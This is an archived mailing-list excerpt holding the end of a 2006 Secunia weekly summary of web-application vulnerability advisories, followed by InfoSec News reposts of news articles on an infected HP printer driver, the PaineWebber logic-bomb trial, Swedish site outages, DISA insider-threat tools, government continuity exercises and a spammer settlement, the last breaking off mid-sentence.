Impact:      Security Bypass, Exposure of sensitive information
Released:    2006-05-31

socsam has discovered a vulnerability in WebCalendar, which can be
exploited by malicious people to bypass certain security restrictions
and disclose sensitive information.

Full Advisory:
http://secunia.com/advisories/20367/

 --

[SA20366] WikiNi Script Insertion Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-05-30

Raphael Huck has discovered some vulnerabilities in WikiNi, which can
be exploited by malicious people to conduct script insertion attacks.

Full Advisory:
http://secunia.com/advisories/20366/

 --

[SA20359] phpBB Nivisec Hacks List Module Local File Inclusion

Critical:    Moderately critical
Where:       From remote
Impact:      Exposure of sensitive information
Released:    2006-05-29

Mustafa Can Bjorn has discovered a vulnerability in the Nivisec Hacks
List module for phpBB, which can be exploited by malicious people to
disclose sensitive information.

Full Advisory:
http://secunia.com/advisories/20359/

 --

[SA20352] Eggblog posts.php SQL Injection Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      Manipulation of data
Released:    2006-05-29

Mustafa Can Bjorn has discovered a vulnerability in Eggblog, which can
be exploited by malicious people to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/20352/

 --

[SA20351] aMule Information Disclosure Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      Exposure of system information, Exposure of sensitive
information
Released:    2006-05-29

A vulnerability has been reported in aMule, which can be exploited by
malicious people and by malicious users to disclose potentially
sensitive information.

Full Advisory:
http://secunia.com/advisories/20351/

 --

[SA20316] Geeklog Multiple Vulnerabilities and Weaknesses

Critical:    Moderately critical
Where:       From remote
Impact:      Cross Site Scripting, Manipulation of data, Exposure of
system information
Released:    2006-05-30

trueend5 has reported some vulnerabilities and weaknesses in Geeklog,
which can be exploited by malicious people to disclose system
information, and conduct cross-site scripting and SQL injection
attacks.

Full Advisory:
http://secunia.com/advisories/20316/

 --

[SA20307] Seditio "Referer" HTTP Header Script Insertion Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-05-29

Yunus Emre Yilmaz has discovered a vulnerability in Seditio, which can
be exploited by malicious people to conduct script insertion attacks.

Full Advisory:
http://secunia.com/advisories/20307/

 --

[SA20304] ByteHoard File Copy and Script Insertion Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      Cross Site Scripting, Manipulation of data
Released:    2006-05-29

Nomenumbra has discovered two vulnerabilities in ByteHoard, which can
be exploited by malicious people to manipulate sensitive information
and conduct script insertion attacks.

Full Advisory:
http://secunia.com/advisories/20304/

 --

[SA20303] MailManager PostgreSQL Encoding-Based SQL Injection

Critical:    Moderately critical
Where:       From remote
Impact:      Manipulation of data
Released:    2006-05-26

A vulnerability has been reported in MailManager, which potentially can
be exploited by malicious people to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/20303/

 --

[SA20297] V-webmail "CONFIG[pear_dir]" File Inclusion Vulnerability

Critical:    Moderately critical
Where:       From remote
Impact:      System access
Released:    2006-05-26

beford has discovered a vulnerability in V-webmail, which can be
exploited by malicious people to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/20297/

 --

[SA20295] Pre Shopping Mall SQL Injection Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      Manipulation of data
Released:    2006-05-26

luny has reported some vulnerabilities in Pre Shopping Mall, which can
be exploited by malicious people to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/20295/

 --

[SA20290] ChatPat Script Insertion and SQL Injection Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      Cross Site Scripting, Manipulation of data
Released:    2006-05-26

luny has reported two vulnerabilities in ChatPat, which can be
exploited by malicious people to conduct script insertion and SQL
injection attacks.

Full Advisory:
http://secunia.com/advisories/20290/

 --

[SA20287] iFdate Cross-Site Scripting and Script Insertion
Vulnerabilities

Critical:    Moderately critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-05-26

luny has reported some vulnerabilities in iFdate, which can be
exploited by malicious people to conduct cross-site scripting and
script insertion attacks.

Full Advisory:
http://secunia.com/advisories/20287/

 --

[SA20286] Realty Pro One Cross-Site Scripting and SQL Injection

Critical:    Moderately critical
Where:       From remote
Impact:      Cross Site Scripting, Manipulation of data
Released:    2006-05-26

luny has reported some vulnerabilities in Realty Pro One, which can be
exploited by malicious people to conduct cross-site scripting and SQL
injection attacks.

Full Advisory:
http://secunia.com/advisories/20286/

 --

[SA20363] XiTi Tracking Script "xiti.js" Cross-Site Scripting
Vulnerabilities

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-05-31

Yannick Daffaud has reported two vulnerabilities in the XiTi Tracking
Script, which can be exploited by malicious people to conduct
cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/20363/

 --

[SA20341] Open Searchable Image Catalogue SQL Injection
Vulnerabilities

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting, Manipulation of data
Released:    2006-05-31

Nenad Jovanovic has discovered some vulnerabilities in Open Searchable
Image Catalogue, which can be exploited by malicious users to conduct
SQL injection attacks and by malicious people to conduct cross-site
scripting attacks.

Full Advisory:
http://secunia.com/advisories/20341/

 --

[SA20340] DGNews "upprocess.php" File Upload Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      System access
Released:    2006-05-30

r0t has discovered a vulnerability in DGNews, which can be exploited by
malicious users to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/20340/

 --

[SA20336] Photoalbum B&W "index.php" Cross-Site Scripting
Vulnerabilities

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-05-30

black-code and sweet-devil have discovered some vulnerabilities in
Photoalbum B&W, which can be exploited by malicious people to conduct
cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/20336/

 --

[SA20334] TikiWiki Multiple Cross-Site Scripting Vulnerabilities

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-05-29

Blwood has discovered some vulnerabilities in TikiWiki, which can be
exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/20334/

 --

[SA20327] Achievo "atkselector" Parameter SQL Injection Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      Manipulation of data
Released:    2006-05-30

Christian Nancy has reported a vulnerability in Achievo, which can be
exploited by malicious users to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/20327/

 --

[SA20324] Vacation Rental Script "obj" Parameter Cross-Site Scripting

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-05-29

luny has discovered a vulnerability in Vacation Rental Script, which
can be exploited by malicious people to conduct cross-site scripting
attacks.

Full Advisory:
http://secunia.com/advisories/20324/

 --

[SA20322] Pretty Guestbook "pagina" Cross-Site Scripting Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-05-29

luny has discovered a vulnerability in Pretty Guestbook, which can be
exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/20322/

 --

[SA20321] Smile Guestbook "pagina" Cross-Site Scripting Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-05-29

luny has discovered a vulnerability in Smile Guestbook, which can be
exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/20321/

 --

[SA20320] Morris Guestbook "pagina" Cross-Site Scripting Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-05-29

luny has discovered a vulnerability in Morris Guestbook, which can be
exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/20320/

 --

[SA20311] php-residence Multiple Script Insertion Vulnerabilities

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-05-29

Nomenumbra has reported some vulnerabilities in php-residence, which
can be exploited by malicious users to conduct script insertion
attacks.

Full Advisory:
http://secunia.com/advisories/20311/

 --

[SA20306] PHPSimpleChoose Cross-Site Scripting Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-05-29

luny has discovered a vulnerability in PHPSimpleChoose, which can be
exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/20306/

 --

[SA20305] PHP-AGTC membership system "useremail" Script Insertion

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-05-29

Nomenumbra has discovered a vulnerability in PHP-AGTC membership
system, which can be exploited by malicious users to conduct script
insertion attacks.

Full Advisory:
http://secunia.com/advisories/20305/

 --

[SA20296] CMS Mundo "searchstring" Cross-Site Scripting Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-05-26

luny has reported a vulnerability in CMS Mundo, which can be exploited
by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/20296/

 --

[SA20293] phpESP ADOdb Cross-Site Scripting Vulnerabilities

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-05-29

Some vulnerabilities have been reported in phpESP, which can be
exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/20293/

 --

[SA20291] AZ Photo Album Script Pro Cross-Site Scripting Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-05-26

luny has reported a vulnerability in AZ Photo Album Script Pro, which
can be exploited by malicious people to conduct cross-site scripting
attacks.

Full Advisory:
http://secunia.com/advisories/20291/

 --

[SA20289] Elite-Board "search" Parameter Cross-Site Scripting
Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-05-26

luny has reported a vulnerability in Elite-Board, which can be
exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/20289/

 --

[SA20285] Assetman Unspecified Script Insertion Vulnerabilities

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-05-29

Nomenumbra has reported some vulnerabilities in Assetman, which can be
exploited by malicious users to conduct script insertion attacks.

Full Advisory:
http://secunia.com/advisories/20285/

 --

[SA20282] iFlance Multiple Cross-Site Scripting Vulnerabilities

Critical:    Less critical
Where:       From remote
Impact:      Cross Site Scripting
Released:    2006-05-26

luny has reported some vulnerabilities in iFlance, which can be
exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/20282/



========================================================================

Secunia recommends that you verify all advisories you receive,
by clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only use
those supplied by the vendor.

Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/

Subscribe:
http://secunia.com/secunia_weekly_summary/

Contact details:
Web	: http://secunia.com/
E-mail	: support at secunia.com
Tel	: +45 70 20 51 44
Fax	: +45 70 20 51 45




From isn at c4i.org  Mon Jun  5 04:26:44 2006
From: isn at c4i.org (InfoSec News)
Date: Mon, 5 Jun 2006 03:26:44 -0500 (CDT)
Subject: [ISN] HP printer drivers hit with Funlove virus
Message-ID: <Pine.LNX.4.44.0606050326340.6233-100000@idle.curiosity.org>

http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9000907

By Robert McMillan 
IDG News Service
June 02, 2006

Hewlett-Packard Co. on Thursday pulled a printer driver from its Web
site after security vendor BitDefender reported that the software was
infected with the same computer virus that infected HP's drivers more
than five years ago.

A BitDefender partner notified the security vendor of the infected
driver software on Wednesday, and the company's security researchers
soon determined that it had the same Funlove virus that had plagued HP
in December 2000.

BitDefender notified HP of the problem on Wednesday, and the infected
printer driver was removed from HP's Web site early Thursday, said
BitDefender spokesman Vitor Souza.

Until then, the virus was being distributed with the Korean version of
the Windows 95/98 driver for HP's Officejet g85 All-in-One printer. HP
no longer sells the all-in-one printer, and the current antivirus
products are able to block it. So while the oversight is an
embarrassment for HP, it's unlikely that many users were affected by
Funlove.

Previously, HP had inadvertently distributed the Funlove virus in
Japanese printer drivers that were made available on the company's Web
site. Souza believes that HP most likely neglected to remove this
particular infected driver back in 2000. "Its just like nobody had run
a test against antivirus [software]," he said.

Even for users who fall prey to the virus, the consequences are not
severe.

When it gets installed, the Funlove pops up a text message that reads
"Fun Loving Criminal," and then attempts to reboot the PC. On Windows
NT machines, it attempts to change system settings so that files that
can normally be seen only by administrators are visible to all.

HP executives were not immediately available to comment for this
story.

BitDefender is owned by Softwin SRL, based in Bucharest, Romania.




From isn at c4i.org  Mon Jun  5 04:26:21 2006
From: isn at c4i.org (InfoSec News)
Date: Mon, 5 Jun 2006 03:26:21 -0500 (CDT)
Subject: [ISN] PaineWebber Systems Admin Faces Trial For Computer Sabotage
Message-ID: <Pine.LNX.4.44.0606050326050.6233-100000@idle.curiosity.org>

http://www.informationweek.com/security/showArticle.jhtml?articleID=188700855

By Sharon Gaudin 
InformationWeek 
Jun 1, 2006 

A former systems administrator for financial giant UBS PaineWebber
goes on trial Tuesday for allegedly sabotaging two-thirds of the
company's computer network in what prosecutors say was a vengeful
attempt to profit from a crashing stock price.

Roger Duronio, 63, of Bogota, N.J., is facing federal charges in front
of a U.S. District Court in Newark, in connection to the creation and
planting of malicious code on more than 1,000 computers in the
company's central office, as well as in approximately 370 branch
offices. When the malicious code, or "logic bomb," was triggered on
March 4, 2002, it began deleting files and data, taking down many
PaineWebber computers across the United States and hindering trading
for days in some branch offices and for several weeks in others,
according to Assistant U.S. Attorney Mauro Wolfe, lead prosecutor on
the case.

The attack, according to the indictment, cost UBS PaineWebber, which
was renamed UBS Wealth Management USA in 2003, $3 million just to
assess and repair the damage. The company didn't submit a list of
losses to the government based on business downtime or lost trading
opportunities.

Chris Adams, Duronio's defense attorney and a partner at Walder Hayden
& Brogan in Roseland, N.J., says the government has the wrong man.  
Duronio has pleaded not guilty to all charges. He has been free on
bail awaiting trial for the past four years. Adams says he's not
working in an IT position at this time.

According to Wolfe, Duronio is facing four counts--one count of
computer intrusion, one count of mail fraud, and two counts of
securities fraud. The government contends that Duronio tried to profit
from the attack by manipulating the stock price of the global
investment banking and securities firm with the attack on its network.

The government contends that in the months leading up to the planting
of the logic bomb and the subsequent attack, Duronio, using the U.S.  
postal system, bought more than $21,000 worth of 'put option'
contracts for PaineWebber's parent company, UBS, A.G.'s stock. A put
option is a type of stock that actually increases in value when the
stock price drops. According to Wolfe, Duronio was betting the attack
would cripple the company's network, and its stock would fall in the
aftermath, allowing him to cash in.

Because of this part of his alleged plan, Duronio is being charged
with mail and securities fraud.

''Computers across the country pretty much all went down at once,''
says Wolfe. ''System administrators started to receive phone calls
that morning that certain computers weren't working. Within minutes,
it escalated from one phone call to 10, 60, 70... over 100 phone
calls.  At or about 10 o'clock they realized it wasn't an isolated
issue but all the computers across the network. It was just too much
of a coincidence for that to happen... This [network] was designed so
everything would not crash at once. The same network designed to not
suffer that problem was suffering that exact problem.''

And Wolfe says the man who was responsible for keeping that exact
system up and running for three years was the one who ultimately took
it down.

''The defendant was motivated by the fact that he was a disgruntled
employee who was not happy with his salary,'' says Wolfe. ''He wanted
an annual salary of $175,000 guaranteed. And I think for the year 2001
he was paid about $13,000 less than that.''


Insider Attacks

Attacks by corporate insiders, even by IT professionals, is not an
uncommon problem, according to last year's CSI/FBI Computer Crime
Survey. With only slight variation from year to year, inside jobs
occur as frequently as the highly publicized outside hacker attacks.  
Insider abuse, according to the survey, cost U.S. companies $6,856,450
last year.

''Insider attacks are definitely more dangerous,'' says Eric Maiwald,
a senior analyst for Burton Group, a research and consulting firm
based in Midvale, Utah. ''The average outside person generally doesn't
have access to your systems. Their first job in attacking you is to
get access, whereas the insider starts out with access. They're
starting one step ahead of the game. You have some general expectation
that they're not trying to cause you harm.''

John O'Leary, director of education at the San Francisco-based
Computer Security Institute, says companies have more to fear from
insiders in general because they know where the weak points in the
network are, and where the critical information is stored. But he adds
that executives have far more to fear from IT workers, because they
not only know how to get to the information but have the tools and the
access rights to do it easily.

''It's easy [to do] because we give our techs a lot of trust, but it's
difficult because we generally put compensating controls in place,''
says O'Leary. ''Other [people] need to edit what these guys are doing.  
Someone needs to see what changes he made. If he could make changes
without somebody noticing, then something is wrong.''

Maiwald, though, says it's exceedingly difficult for companies to put
in enough processes and controls to completely shut down someone with
system administrator-level authority and access.

''It's only the trusted individuals who can betray you at that level,"  
says Maiwald. ''If someone is digging ditches for you, they don't have
a lot of power. But your system administrator has a lot of power
because it's part of the job. If you put too many controls on them,
they can't do their jobs... There are controls that can be put in
place to do such things but they require a company to be very
watchful, along with additional staff, [and] specific procedures. And
it's just not very easy to do that.''


The Duronio Case

In this case, the government alleges that Duronio was a trusted
employee - one with great access and authority -- who used that
against PaineWebber. The charge of computer intrusion is based on the
government's allegations that Duronio built the code for the logic
bomb, installed it on Unix machines in PaineWebber's central office in
Weehawkin, N.J., and then pushed it out to about 1,000 computers
across the company's national network. Wolfe says the malicious code
was planted ''from coast to coast."

The logic bomb, which was made up of only 50 to 70 lines of code, was
built to delete every file on the system, according to the
prosecution. Duronio, who quit his job at PaineWebber a few weeks
before the bomb went off, also allegedly planted the code on the
system's backup servers so that when IT workers tried to restore
operations using backup tapes, those files were deleted as well. The
bomb was designed to go off every Monday at 9:30 a.m. - just as the
stock market opened - in March, April and May of 2002.

Trading, the lifeblood of the company, was interrupted because of the
crippled network. PaineWebber reported to the government that trading
was hindered for a few days in larger locations, and for as long as a
few weeks in some branch offices. According to the prosecution, 350
IBM support personnel were brought in to aid with the nationwide
recovery effort.

''Could they trade? Yes. Could they trade the way they normally
traded? No,'' says Wolfe. ''Normally... the broker would sit at his
desk and go online and trade for you... If the client didn't know what
the balance of their account was, they couldn't trade for them.''

The government also contends that Duronio planted the code piecemeal
during the previous November and December from a remote location.  
Wolfe says records show that Duronio's password and user account
information were used to gain remote access to the areas where the
malicious code was built inside the PaineWebber network. The U.S.  
Secret Service, which is frequently called in to conduct criminal
investigations and specifically cyber crime, executed a warrant on
March 21, 2002, and allegedly found hard copy of the logic bomb's
source code on the defendant's bedroom dresser. They also allegedly
found the source code on two of his four home computers.

''The defendant used the information of the impending logic bomb
attack,'' says Wolfe. ''He purchased securities. He bet against the
company that the company stock would drop... He engaged in an artifice
or scheme to fraud investors.''

Computer sabotage is a federal offense if it affects a computer used
in interstate commerce and causes more than $5,000 worth of damage to
the company over a 12-month span. Duronio faces a maximim sentence of
30 years, fines of up to $1 million and restitution for the $3.2
million PaineWebber spent on recovery.




From isn at c4i.org  Mon Jun  5 04:26:32 2006
From: isn at c4i.org (InfoSec News)
Date: Mon, 5 Jun 2006 03:26:32 -0500 (CDT)
Subject: [ISN] Swedish police probe site crash
Message-ID: <Pine.LNX.4.44.0606050326230.6233-100000@idle.curiosity.org>

http://news.com.com/Swedish+police+probe+site+crash/2100-7349_3-6079740.html

By Reuters 
June 4, 2006

Sweden's domestic intelligence agency said it would probe why the
government's Web site crashed on Sunday amid reports hackers had
sought revenge for a crackdown on alleged online piracy.

The government Web site went off line in the early hours of Sunday.  
The Internet home page of the national police crashed in similar
fashion on Thursday.

The police Web site problem came a day after the Pirate Bay Internet
page, which the recording industry calls a major source for
downloading pirated music and films, was shut by police.

"They (the government) contacted us and wanted to make a police
complaint that something has happened with their home page and it is
now a question for us investigate if it is a crime or something else,"  
said Anders Thornberg, a spokesman for the Security Police
intelligence agency.

Local media said hackers attacked both sites, now functioning again,
after the clampdown on Pirate Bay. Pirate Bay is also up and running
again.

Sweden's Emergency Management Agency earlier warned all 31 bodies
involved in emergency management, such as the police and rescue
services, and all 21 local authorities to ensure they were safe from
attacks on their Web sites.

Newspaper Aftonbladet quoted a group called World Wide Hackers as
saying they had arranged an attack on the government's Web site.

Sweden last year banned the downloading of copyright protected music
and movies from the Internet after being singled out for criticism by
Hollywood. The raid on Pirate Bay was the latest of several actions
against suspected online piracy.

Critics say the police are heavy handed and that people should have
access to free information via the Internet, including file sharing.

Several hundred people demonstrated in Stockholm on Saturday in
support of Pirate Bay.

Story Copyright ? 2006 Reuters Limited. All rights reserved.




From isn at c4i.org  Mon Jun  5 04:26:55 2006
From: isn at c4i.org (InfoSec News)
Date: Mon, 5 Jun 2006 03:26:55 -0500 (CDT)
Subject: [ISN] DISA seeks input on insider threat tools
Message-ID: <Pine.LNX.4.44.0606050326450.6233-100000@idle.curiosity.org>

http://www.fcw.com/article94741-06-02-06-Web

By Bob Brewin
June 2, 2006 

The Defense Information Systems Agency wants industry input on tools 
that could counter insider threats to Defense Department information 
systems.

DISA said traditional efforts to secure networks focus on outside 
threats, but insiders pose an equally damaging threat. And they can 
access DOD networks without detection by the security systems.

DISA, in a request for information released June 1 [1], said it is
looking for an insider threat focused observation tool that could be
deployed on selected host DOD machines to aggressively gather and
analyze data on inside threats.

DISA said the insider threat tools would enhance the network security 
of DOD information systems. 

The agency would install the host machines on network end points and 
could be servers, desktop PCs or laptop PCs equipped with agent-based 
tools that can monitor insider network activity. The tool would 
collect data such as user IDs, computer type and the processes - 
e-mail clients, Web browsers, office management tools, database access 
- that monitored computers run.

DISA said it wants tools that can then conduct user analysis on the 
collected data and warn of anomalies based on user profiles and 
behavior patterns.

DISA envisions that the host machines would connect to a central 
manager that can handle as many as 250 hosts at a time, with hosts 
located within an enclave, such as local-area or base network. 

The insider threat tools should also include a console, which is the 
central display and action point for collected user data and will 
provide the operator with real-time insight into user activity, the 
RFI states. 

DISA said it wants a tool capable of working with a wide range of 
operating systems including Microsoft Windows 2000, Windows XP, 
Windows NT4, Sun Microsystems Solaris, Unix and Linux.

The due date for RFI responses is July 5.

[1] http://www.fbo.gov/spg/DISA/D4AD/DITCO/RFI418/listing.html




From isn at c4i.org  Mon Jun  5 04:27:12 2006
From: isn at c4i.org (InfoSec News)
Date: Mon, 5 Jun 2006 03:27:12 -0500 (CDT)
Subject: [ISN] BACK TO THE BUNKER
Message-ID: <Pine.LNX.4.44.0606050326560.6233-100000@idle.curiosity.org>

http://www.washingtonpost.com/wp-dyn/content/article/2006/06/02/AR2006060201410.html

By William M. Arkin
The Washington Post 
June 4, 2006

On Monday, June 19, about 4,000 government workers representing more
than 50 federal agencies from the State Department to the Commodity
Futures Trading Commission will say goodbye to their families and set
off for dozens of classified emergency facilities stretching from the
Maryland and Virginia suburbs to the foothills of the Alleghenies.  
They will take to the bunkers in an "evacuation" that my sources
describe as the largest "continuity of government" exercise ever
conducted, a drill intended to prepare the U.S. government for an
event even more catastrophic than the Sept. 11, 2001, attacks.

The exercise is the latest manifestation of an obsession with
government survival that has been a hallmark of the Bush
administration since 9/11, a focus of enormous and often absurd time,
money and effort that has come to echo the worst follies of the Cold
War. The vast secret operation has updated the duck-and-cover
scenarios of the 1950s with state-of-the-art technology -- alerts and
updates delivered by pager and PDA, wireless priority service, video
teleconferencing, remote backups -- to ensure that "essential"  
government functions continue undisrupted should a terrorist's nuclear
bomb go off in downtown Washington.

But for all the BlackBerry culture, the outcome is still old-fashioned
black and white: We've spent hundreds of millions of dollars on
alternate facilities, data warehouses and communications, yet no one
can really foretell what would happen to the leadership and
functioning of the federal government in a catastrophe.

After 9/11, The Washington Post reported that President Bush had set
up a shadow government of about 100 senior civilian managers to live
and work outside Washington on a rotating basis to ensure the
continuity of national security. Since then, a program once focused on
presidential succession and civilian control of U.S. nuclear weapons
has been expanded to encompass the entire government. From the
Department of Education to the Small Business Administration to the
National Archives, every department and agency is now required to plan
for continuity outside Washington.

Yet according to scores of documents I've obtained and interviews with
half a dozen sources, there's no greater confidence today that
essential services would be maintained in a disaster. And no one
really knows how an evacuation would even be physically possible.

Moreover, since 9/11 and Hurricane Katrina, the definition of what
constitutes an "essential" government function has been expanded so
ridiculously beyond core national security functions -- do we really
need patent and trademark processing in the middle of a nuclear
holocaust? -- that the term has become meaningless. The intent of the
government effort may be laudable, even necessary, but a
hyper-centralized approach based on the Cold War model of evacuations
and bunkering makes it practically worthless.

That the continuity program is so poorly conceived, and poorly run,
should come as no surprise. That's because the same Federal Emergency
Management Agency that failed New Orleans after Katrina, an agency
that a Senate investigating committee has pronounced "in shambles and
beyond repair," is in charge of this enormous effort to plan for the
U.S. government's survival.

Continuity programs began in the early 1950s, when the threat of
nuclear war moved the administration of President Harry S. Truman to
begin planning for emergency government functions and civil defense.  
Evacuation bunkers were built, and an incredibly complex and secretive
shadow government program was created.

At its height, the grand era of continuity boasted the fully
operational Mount Weather, a civilian bunker built along the crest of
Virginia's Blue Ridge, to which most agency heads would evacuate; the
Greenbrier hotel complex and bunker in West Virginia, where Congress
would shelter; and Raven Rock, or Site R, a national security bunker
bored into granite along the Pennsylvania-Maryland border near Camp
David, where the Joint Chiefs of Staff would command a protracted
nuclear war. Special communications networks were built, and
evacuation and succession procedures were practiced continually.

When the Soviet Union crumbled, the program became a Cold War
curiosity: Then-Defense Secretary Dick Cheney ordered Raven Rock into
caretaker status in 1991. The Greenbrier bunker was shuttered and a
30-year-old special access program was declassified three years later.

Then came the terrorist attacks of the mid-1990s and the looming Y2K
rollover, and suddenly continuity wasn't only for nuclear war anymore.  
On Oct. 21, 1998, President Bill Clinton signed Presidential Decision
Directive 67, "Enduring Constitutional Government and Continuity of
Government Operations." No longer would only the very few elite
leaders responsible for national security be covered. Instead, every
single government department and agency was directed to see to it that
they could resume critical functions within 12 hours of a warning, and
keep their operations running at emergency facilities for up to 30
days. FEMA was put in charge of this broad new program.

On 9/11, the program was put to the test -- and failed. Not on the
national security side: Vice President Cheney and others in the
national security leadership were smoothly whisked away from the
capital following procedures overseen by the Pentagon and the White
House Military Office. But like the mass of Washingtonians, officials
from other agencies found themselves virtually on their own, unsure of
where to go or what to do, or whom to contact for the answers.

In the aftermath, the federal government was told to reinvigorate its
continuity efforts. Bush approved lines of succession for civil
agencies. Cabinet departments and agencies were assigned specific
emergency responsibilities. FEMA issued new preparedness guidelines
and oversaw training. A National Capital Region continuity working
group established in 1999, comprising six White House groups, 15
departments and 61 agencies, met to coordinate.

But all the frenetic activity did not produce a government prepared
for the worst. A year after 9/11, and almost three years after the
deadline set in Clinton's 1998 directive, the Government Accounting
Office evaluated 38 agencies and found that not one had addressed all
the issues it had been ordered to. A 2004 GAO audit of 34 government
continuity-of-operations plans found total confusion on the question
of essential functions. One unnamed organization listed 399 such
functions. A department included providing "speeches and articles for
the Secretary and Deputy Secretary" among its essential duties, while
neglecting many of its central programs.

The confusion and absurdity have continued, according to documents
I've collected over the past few years. In June 2004, FEMA told
federal agencies that essential services in a catastrophe would
include not only such obvious ones as electric power generation and
disaster relief but also patent and trademark processing, student aid
and passport processing. A month earlier, FEMA had told states and
local communities that library services should be counted as essential
along with fire protection and law enforcement.

None of this can be heartening to Americans who want to believe that
in a crisis, their government can distinguish between what is truly
essential and what isn't -- and provide it.

Just two years ago, an exercise called Forward Challenge '04 pointed
up the danger of making everyone and everything essential: Barely an
hour after agencies were due to arrive at their relocation sites, the
Office of Management and Budget asked the reconstituted government to
identify emergency funding requirements.

As one after-action report for the exercise later put it in a classic
case of understatement: "It was not clear . . . whether this would be
a realistic request at that stage of an emergency."

This year's exercise, Forward Challenge '06, will be the third major
interagency continuity exercise since 9/11. Larger than Forward
Challenge '04 and the Pinnacle exercise held last year, it requires 31
departments and agencies (including FEMA) to relocate. Fifty to 60 are
expected to take part.

According to government sources, the exercise will test the newly
created continuity of government alert conditions -- called COGCONs --
that emulate the DEFCONs of the national security community. Forward
Challenge will begin with a series of alerts via BlackBerry and pager
to key officials. It will test COGCON 1, the highest level of
preparedness, in which each department and agency is required to have
at least one person in its chain of command and sufficient staffing at
alternate operating facilities to perform essential functions.

Though key White House officials and military leadership would be
relocated via the Pentagon's Joint Emergency Evacuation Program
(JEEP), the civilians are on their own to make it to their designated
evacuation points.

But fear not: Each organization's COOP, or continuity of operations
plan, details the best routes to the emergency locations. The plans
even spell out what evacuees should take with them (recommended items:  
a combination lock, a flashlight, two towels and a small box of
washing powder).

Can such an exercise, announced well in advance, hope to re-create any
of the tensions and fears of a real crisis? How do you simulate the
experience of driving through blazing, radiated, panic-stricken
streets to emergency bunker sites miles away?

As the Energy Department stated in its review of Forward Challenge
'04, "a method needs to be devised to realistically test the ability
of . . . federal offices to relocate to their COOP sites using a
scenario that simulates . . . the monumental challenges that would be
involved in evacuating the city."

With its new plans and procedures, Washington may think it has thought
of everything to save itself. Forward Challenge will no doubt be
deemed a success, and officials will pronounce the
continuity-of-government project sound. There will be lessons to be
learned that will justify more millions of dollars and more work in
the infinite effort to guarantee order out of chaos.

But the main defect -- a bunker mentality that considers too many
people and too many jobs "essential" -- will remain unchallenged.

-=-

William M. Arkin writes the Early Warning blog for washingtonpost.com
and is the author of "Code Names: Deciphering U.S. Military Plans,
Programs and Operations in the 9/11 World" (Steerforth Press).

? 2006 The Washington Post Company




From isn at c4i.org  Tue Jun  6 06:03:36 2006
From: isn at c4i.org (InfoSec News)
Date: Tue, 6 Jun 2006 05:03:36 -0500 (CDT)
Subject: [ISN] Spammer settles suit for $1 million
Message-ID: <Pine.LNX.4.44.0606060503270.3853-100000@idle.curiosity.org>

http://news.com.com/2100-7348_3-6079868.html

By Will Sturgeon 
Special to CNET News.com
June 5, 2006

A major spammer who was accused of sending up to 25 million e-mails
per day has settled a lawsuit with Microsoft and the state of Texas.

The settlement has cost Ryan Pitylak $1 million, as well as the
seizure of many of the assets he accumulated during a short-lived
career as one of the world's worst spammers.

At the peak of his spamming activity, the 24-year-old Texas resident
was listed as the world's fourth most-prolific spammer by antispam
group Spamhaus.

Now Pitylak is claiming something of an epiphany, saying he has seen
the error of his ways and will dedicate his efforts to trying to rid
the world of nuisance e-mail. He has even taken to referring to
himself as an "antispam activist" in an apparent change of heart of
epic proportions.
 
On Saturday, Pitylak wrote in his blog: "Over time I have come to see
how I was wrong to think of spam as just a game of cat and mouse with
corporate e-mail administrators. I now understand why so much effort
